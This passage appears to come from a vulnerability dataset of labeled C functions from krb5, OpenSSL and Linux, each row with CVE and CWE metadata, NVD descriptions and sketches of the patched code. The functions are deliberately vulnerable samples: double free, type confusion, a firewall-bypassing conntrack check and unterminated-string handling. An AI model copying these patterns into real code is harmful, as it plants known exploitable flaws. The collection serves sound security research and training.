| 6,731,538,295,626,295,000,000,000,000,000,000,000 | auth_gssapi_misc.c | 249,867,039,175,423,800,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2014-9421 | The auth_gssapi_unwrap_data function in lib/rpc/auth_gssapi_misc.c in MIT Kerberos 5 (aka krb5) through 1.11.5, 1.12.x through 1.12.2, and 1.13.x before 1.13.1 does not properly handle partial XDR deserialization, which allows remote authenticated users to cause a denial of service (use-after-free and double free, and daemon crash) or possibly execute arbitrary code via malformed XDR data, as demonstrated by data sent to kadmind. | https://nvd.nist.gov/vuln/detail/CVE-2014-9421 |
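The double free arises because xdr_bytes() can fail after partially allocating in_buf.value, the unwrap routine then freed it via a local XDR_FREE pass, and svctcp_getargs()/svcudp_getargs() freed the same pointer again. Sketch of the patched failure path, which deletes the local cleanup and leaves ownership with the callers:

	if (! xdr_bytes(in_xdrs, (char **) &in_buf.value,
			&length, (unsigned int) -1)) {
	     PRINTF(("gssapi_unwrap_data: deserializing encrypted data failed\n"));
	     /* Do NOT free the partial result here; svctcp_getargs() and
	      * svcudp_getargs() own that cleanup. */
	     return FALSE;
	}

The companion change in the commit message, nulling out pointers in xdr_krb5_tl_data() and xdr_krb5_principal() after freeing them, makes repeated XDR_FREE passes idempotent, matching the behaviour of xdr_bytes() and xdr_string().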
1,619 | openssl | 470990fee0182566d439ef7e82d1abf18b7085d7 | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/470990fee0182566d439ef7e82d1abf18b7085d7 | Free up s->d1->buffered_app_data.q properly.
PR#3286 | 1 | static void dtls1_clear_queues(SSL *s)
{
pitem *item = NULL;
hm_fragment *frag = NULL;
DTLS1_RECORD_DATA *rdata;
while( (item = pqueue_pop(s->d1->unprocessed_rcds.q)) != NULL)
{
rdata = (DTLS1_RECORD_DATA *) item->data;
if (rdata->rbuf.buf)
{
OPENSSL_free(rdata->rbuf.buf);
}
OPENSSL_free(item->data);
pitem_free(item);
}
while( (item = pqueue_pop(s->d1->processed_rcds.q)) != NULL)
{
rdata = (DTLS1_RECORD_DATA *) item->data;
if (rdata->rbuf.buf)
{
OPENSSL_free(rdata->rbuf.buf);
}
OPENSSL_free(item->data);
pitem_free(item);
}
while( (item = pqueue_pop(s->d1->buffered_messages)) != NULL)
{
frag = (hm_fragment *)item->data;
OPENSSL_free(frag->fragment);
OPENSSL_free(frag);
pitem_free(item);
}
while ( (item = pqueue_pop(s->d1->sent_messages)) != NULL)
{
frag = (hm_fragment *)item->data;
OPENSSL_free(frag->fragment);
OPENSSL_free(frag);
pitem_free(item);
}
while ( (item = pqueue_pop(s->d1->buffered_app_data.q)) != NULL)
{
frag = (hm_fragment *)item->data;
OPENSSL_free(frag->fragment);
OPENSSL_free(frag);
pitem_free(item);
}
}
| 120,961,465,274,779,570,000,000,000,000,000,000,000 | None | null | [
"CWE-119"
] | CVE-2014-8176 | The dtls1_clear_queues function in ssl/d1_lib.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h frees data structures without considering that application data can arrive between a ChangeCipherSpec message and a Finished message, which allows remote DTLS peers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unexpected application data. | https://nvd.nist.gov/vuln/detail/CVE-2014-8176 |
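The bug is a type confusion in the final loop: entries on s->d1->buffered_app_data.q are DTLS1_RECORD_DATA records queued for application data that arrived between ChangeCipherSpec and Finished, not hm_fragments, so freeing frag->fragment reads through the wrong structure layout. Sketch of the corrected loop, freeing these items the same way as the unprocessed/processed record queues above:

	while ( (item = pqueue_pop(s->d1->buffered_app_data.q)) != NULL)
		{
		rdata = (DTLS1_RECORD_DATA *) item->data;
		if (rdata->rbuf.buf)
			{
			OPENSSL_free(rdata->rbuf.buf);
			}
		OPENSSL_free(item->data);
		pitem_free(item);
		}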
1,634 | linux | db29a9508a9246e77087c5531e45b2c88ec6988b | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/db29a9508a9246e77087c5531e45b2c88ec6988b | netfilter: conntrack: disable generic tracking for known protocols
Given following iptables ruleset:
-P FORWARD DROP
-A FORWARD -m sctp --dport 9 -j ACCEPT
-A FORWARD -p tcp --dport 80 -j ACCEPT
-A FORWARD -p tcp -m conntrack -m state ESTABLISHED,RELATED -j ACCEPT
One would assume that this allows SCTP on port 9 and TCP on port 80.
Unfortunately, if the SCTP conntrack module is not loaded, this allows
*all* SCTP communication, to pass though, i.e. -p sctp -j ACCEPT,
which we think is a security issue.
This is because on the first SCTP packet on port 9, we create a dummy
"generic l4" conntrack entry without any port information (since
conntrack doesn't know how to extract this information).
All subsequent packets that are unknown will then be in established
state since they will fallback to proto_generic and will match the
'generic' entry.
Our originally proposed version [1] completely disabled generic protocol
tracking, but Jozsef suggests to not track protocols for which a more
suitable helper is available, hence we now mitigate the issue for in
tree known ct protocol helpers only, so that at least NAT and direction
information will still be preserved for others.
[1] http://www.spinics.net/lists/netfilter-devel/msg33430.html
Joint work with Daniel Borkmann.
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
Acked-by: Jozsef Kadlecsik <kadlec@blackhole.kfki.hu>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> | 1 | static bool generic_new(struct nf_conn *ct, const struct sk_buff *skb,
unsigned int dataoff, unsigned int *timeouts)
{
return true;
}
| 94,206,534,282,979,970,000,000,000,000,000,000,000 | nf_conntrack_proto_generic.c | 39,813,758,207,073,290,000,000,000,000,000,000,000 | [
"CWE-254"
] | CVE-2014-8160 | net/netfilter/nf_conntrack_proto_generic.c in the Linux kernel before 3.18 generates incorrect conntrack entries during handling of certain iptables rule sets for the SCTP, DCCP, GRE, and UDP-Lite protocols, which allows remote attackers to bypass intended access restrictions via packets with disallowed port numbers. | https://nvd.nist.gov/vuln/detail/CVE-2014-8160 |
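The one-line generic_new() above accepts every flow, which is what lets the first SCTP packet mint an "established" generic entry that matches the conntrack ACCEPT rule. A sketch close to the upstream patch: the generic tracker refuses any protocol for which a dedicated in-tree helper exists (the CONFIG_*_MODULE guards cover the module-built case), and generic_new() consults that predicate.

	static bool nf_generic_should_process(u8 proto)
	{
		switch (proto) {
	#ifdef CONFIG_NF_CT_PROTO_SCTP_MODULE
		case IPPROTO_SCTP:
			return false;
	#endif
	#ifdef CONFIG_NF_CT_PROTO_DCCP_MODULE
		case IPPROTO_DCCP:
			return false;
	#endif
	#ifdef CONFIG_NF_CT_PROTO_GRE_MODULE
		case IPPROTO_GRE:
			return false;
	#endif
	#ifdef CONFIG_NF_CT_PROTO_UDPLITE_MODULE
		case IPPROTO_UDPLITE:
			return false;
	#endif
		default:
			return true;
		}
	}

	static bool generic_new(struct nf_conn *ct, const struct sk_buff *skb,
				unsigned int dataoff, unsigned int *timeouts)
	{
		return nf_generic_should_process(nf_ct_protonum(ct));
	}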
1,635 | linux | 8d0207652cbe27d1f962050737848e5ad4671958 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/8d0207652cbe27d1f962050737848e5ad4671958 | ->splice_write() via ->write_iter()
iter_file_splice_write() - a ->splice_write() instance that gathers the
pipe buffers, builds a bio_vec-based iov_iter covering those and feeds
it to ->write_iter(). A bunch of simple cases converted to that...
[AV: fixed the braino spotted by Cyrill]
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | 1 | xfs_file_splice_write(
struct pipe_inode_info *pipe,
struct file *outfilp,
loff_t *ppos,
size_t count,
unsigned int flags)
{
struct inode *inode = outfilp->f_mapping->host;
struct xfs_inode *ip = XFS_I(inode);
int ioflags = 0;
ssize_t ret;
XFS_STATS_INC(xs_write_calls);
if (outfilp->f_mode & FMODE_NOCMTIME)
ioflags |= IO_INVIS;
if (XFS_FORCED_SHUTDOWN(ip->i_mount))
return -EIO;
xfs_ilock(ip, XFS_IOLOCK_EXCL);
trace_xfs_file_splice_write(ip, count, *ppos, ioflags);
ret = generic_file_splice_write(pipe, outfilp, ppos, count, flags);
if (ret > 0)
XFS_STATS_ADD(xs_write_bytes, ret);
xfs_iunlock(ip, XFS_IOLOCK_EXCL);
return ret;
}
| 58,931,614,698,813,260,000,000,000,000,000,000,000 | None | null | [
"CWE-264"
] | CVE-2014-7822 | The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file, which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, as demonstrated by use of a file descriptor associated with an ext4 filesystem. | https://nvd.nist.gov/vuln/detail/CVE-2014-7822 |
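After this change xfs_file_splice_write() disappears entirely: XFS points .splice_write at the new generic helper, which gathers the pipe buffers into a bio_vec-backed iov_iter and pushes it through ->write_iter(), so the normal write-path checks (including the maximum single-file size limit) apply to splices too. A hedged sketch of the resulting wiring; the xfs_file_write_iter and xfs_file_splice_read names reflect that era's XFS and are assumptions here:

	const struct file_operations xfs_file_operations = {
		/* ... */
		.write_iter	= xfs_file_write_iter,
		.splice_read	= xfs_file_splice_read,
		.splice_write	= iter_file_splice_write,
		/* ... */
	};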
1,636 | krb5 | 102bb6ebf20f9174130c85c3b052ae104e5073ec | https://github.com/krb5/krb5 | https://github.com/krb5/krb5/commit/102bb6ebf20f9174130c85c3b052ae104e5073ec | Fix krb5_read_message handling [CVE-2014-5355]
In recvauth_common, do not use strcmp against the data fields of
krb5_data objects populated by krb5_read_message(), as there is no
guarantee that they are C strings. Instead, create an expected
krb5_data value and use data_eq().
In the sample user-to-user server application, check that the received
client principal name is null-terminated before using it with printf
and krb5_parse_name.
CVE-2014-5355:
In MIT krb5, when a server process uses the krb5_recvauth function, an
unauthenticated remote attacker can cause a NULL dereference by
sending a zero-byte version string, or a read beyond the end of
allocated storage by sending a non-null-terminated version string.
The example user-to-user server application (uuserver) is similarly
vulnerable to a zero-length or non-null-terminated principal name
string.
The krb5_recvauth function reads two version strings from the client
using krb5_read_message(), which produces a krb5_data structure
containing a length and a pointer to an octet sequence. krb5_recvauth
assumes that the data pointer is a valid C string and passes it to
strcmp() to verify the versions. If the client sends an empty octet
sequence, the data pointer will be NULL and strcmp() will dereference
a NULL pointer, causing the process to crash. If the client sends a
non-null-terminated octet sequence, strcmp() will read beyond the end
of the allocated storage, possibly causing the process to crash.
uuserver similarly uses krb5_read_message() to read a client principal
name, and then passes it to printf() and krb5_parse_name() without
verifying that it is a valid C string.
The krb5_recvauth function is used by kpropd and the Kerberized
versions of the BSD rlogin and rsh daemons. These daemons are usually
run out of inetd or in a mode which forks before processing incoming
connections, so a process crash will generally not result in a
complete denial of service.
Thanks to Tim Uglow for discovering this issue.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:P/E:POC/RL:OF/RC:C
[tlyu@mit.edu: CVSS score]
ticket: 8050 (new)
target_version: 1.13.1
tags: pullup | 1 | int main(argc, argv)
int argc;
char *argv[];
{
krb5_data pname_data, tkt_data;
int sock = 0;
socklen_t l;
int retval;
struct sockaddr_in l_inaddr, f_inaddr; /* local, foreign address */
krb5_creds creds, *new_creds;
krb5_ccache cc;
krb5_data msgtext, msg;
krb5_context context;
krb5_auth_context auth_context = NULL;
#ifndef DEBUG
freopen("/tmp/uu-server.log", "w", stderr);
#endif
retval = krb5_init_context(&context);
if (retval) {
com_err(argv[0], retval, "while initializing krb5");
exit(1);
}
#ifdef DEBUG
{
int one = 1;
int acc;
struct servent *sp;
socklen_t namelen = sizeof(f_inaddr);
if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
com_err("uu-server", errno, "creating socket");
exit(3);
}
l_inaddr.sin_family = AF_INET;
l_inaddr.sin_addr.s_addr = 0;
if (argc == 2) {
l_inaddr.sin_port = htons(atoi(argv[1]));
} else {
if (!(sp = getservbyname("uu-sample", "tcp"))) {
com_err("uu-server", 0, "can't find uu-sample/tcp service");
exit(3);
}
l_inaddr.sin_port = sp->s_port;
}
(void) setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (char *)&one, sizeof (one));
if (bind(sock, (struct sockaddr *)&l_inaddr, sizeof(l_inaddr))) {
com_err("uu-server", errno, "binding socket");
exit(3);
}
if (listen(sock, 1) == -1) {
com_err("uu-server", errno, "listening");
exit(3);
}
printf("Server started\n");
fflush(stdout);
if ((acc = accept(sock, (struct sockaddr *)&f_inaddr, &namelen)) == -1) {
com_err("uu-server", errno, "accepting");
exit(3);
}
dup2(acc, 0);
close(sock);
sock = 0;
}
#endif
retval = krb5_read_message(context, (krb5_pointer) &sock, &pname_data);
if (retval) {
com_err ("uu-server", retval, "reading pname");
return 2;
}
retval = krb5_read_message(context, (krb5_pointer) &sock, &tkt_data);
if (retval) {
com_err ("uu-server", retval, "reading ticket data");
return 2;
}
retval = krb5_cc_default(context, &cc);
if (retval) {
com_err("uu-server", retval, "getting credentials cache");
return 4;
}
memset (&creds, 0, sizeof(creds));
retval = krb5_cc_get_principal(context, cc, &creds.client);
if (retval) {
com_err("uu-client", retval, "getting principal name");
return 6;
}
/* client sends it already null-terminated. */
printf ("uu-server: client principal is \"%s\".\n", pname_data.data);
retval = krb5_parse_name(context, pname_data.data, &creds.server);
if (retval) {
com_err("uu-server", retval, "parsing client name");
return 3;
}
creds.second_ticket = tkt_data;
printf ("uu-server: client ticket is %d bytes.\n",
creds.second_ticket.length);
retval = krb5_get_credentials(context, KRB5_GC_USER_USER, cc,
&creds, &new_creds);
if (retval) {
com_err("uu-server", retval, "getting user-user ticket");
return 5;
}
#ifndef DEBUG
l = sizeof(f_inaddr);
if (getpeername(0, (struct sockaddr *)&f_inaddr, &l) == -1)
{
com_err("uu-server", errno, "getting client address");
return 6;
}
#endif
l = sizeof(l_inaddr);
if (getsockname(0, (struct sockaddr *)&l_inaddr, &l) == -1)
{
com_err("uu-server", errno, "getting local address");
return 6;
}
/* send a ticket/authenticator to the other side, so it can get the key
we're using for the krb_safe below. */
retval = krb5_auth_con_init(context, &auth_context);
if (retval) {
com_err("uu-server", retval, "making auth_context");
return 8;
}
retval = krb5_auth_con_setflags(context, auth_context,
KRB5_AUTH_CONTEXT_DO_SEQUENCE);
if (retval) {
com_err("uu-server", retval, "initializing the auth_context flags");
return 8;
}
retval =
krb5_auth_con_genaddrs(context, auth_context, sock,
KRB5_AUTH_CONTEXT_GENERATE_LOCAL_FULL_ADDR |
KRB5_AUTH_CONTEXT_GENERATE_REMOTE_FULL_ADDR);
if (retval) {
com_err("uu-server", retval, "generating addrs for auth_context");
return 9;
}
#if 1
retval = krb5_mk_req_extended(context, &auth_context,
AP_OPTS_USE_SESSION_KEY,
NULL, new_creds, &msg);
if (retval) {
com_err("uu-server", retval, "making AP_REQ");
return 8;
}
retval = krb5_write_message(context, (krb5_pointer) &sock, &msg);
#else
retval = krb5_sendauth(context, &auth_context, (krb5_pointer)&sock, "???",
0, 0,
AP_OPTS_MUTUAL_REQUIRED | AP_OPTS_USE_SESSION_KEY,
NULL, &creds, cc, NULL, NULL, NULL);
#endif
if (retval)
goto cl_short_wrt;
free(msg.data);
msgtext.length = 32;
msgtext.data = "Hello, other end of connection.";
retval = krb5_mk_safe(context, auth_context, &msgtext, &msg, NULL);
if (retval) {
com_err("uu-server", retval, "encoding message to client");
return 6;
}
retval = krb5_write_message(context, (krb5_pointer) &sock, &msg);
if (retval) {
cl_short_wrt:
com_err("uu-server", retval, "writing message to client");
return 7;
}
krb5_free_data_contents(context, &msg);
krb5_free_data_contents(context, &pname_data);
/* tkt_data freed with creds */
krb5_free_cred_contents(context, &creds);
krb5_free_creds(context, new_creds);
krb5_cc_close(context, cc);
krb5_auth_con_free(context, auth_context);
krb5_free_context(context);
return 0;
}
| 132,886,479,854,659,200,000,000,000,000,000,000,000 | server.c | 36,266,010,581,253,480,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2014-5355 | MIT Kerberos 5 (aka krb5) through 1.13.1 incorrectly expects that a krb5_read_message data field is represented as a string ending with a '\0' character, which allows remote attackers to (1) cause a denial of service (NULL pointer dereference) via a zero-byte version string or (2) cause a denial of service (out-of-bounds read) by omitting the '\0' character, related to appl/user_user/server.c and lib/krb5/krb/recvauth.c. | https://nvd.nist.gov/vuln/detail/CVE-2014-5355 |
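The server above simply trusts the on-the-wire claim recorded in its own comment ("client sends it already null-terminated"). A sketch close to the upstream patch verifies that claim before pname_data.data ever reaches printf() or krb5_parse_name(); the equivalent recvauth_common change replaces strcmp() on krb5_read_message() results with a length-aware data_eq() comparison.

	if (pname_data.length == 0 ||
	    pname_data.data[pname_data.length - 1] != '\0') {
		com_err("uu-server", 0, "client principal name not null-terminated");
		return 2;
	}
	printf ("uu-server: client principal is \"%s\".\n", pname_data.data);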